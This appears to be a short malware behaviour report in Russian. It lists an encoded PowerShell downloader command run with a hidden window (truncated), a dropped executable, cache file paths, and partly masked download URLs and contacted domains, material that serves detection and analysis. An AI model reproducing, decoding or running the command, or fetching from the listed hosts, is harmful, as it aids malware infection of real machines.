Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBlAHQAaAA9ACcAZwBhAHYAYgBpAG8AdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAFkAYABwAGAAUgBvAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...
- %HOMEPATH%\133.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\133.exe
- 'bn##ati.ir':80
- http://me##nor.gr/docs/q75cvd/
- DNS ASK te###hint.com
- DNS ASK or#######onale.metodoinforma.it
- DNS ASK me##nor.gr
- DNS ASK bn##ati.ir
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBlAHQAaAA9ACcAZwBhAHYAYgBpAG8AdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAFkAYABwAGAAUgBvAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...' (со скрытым окном)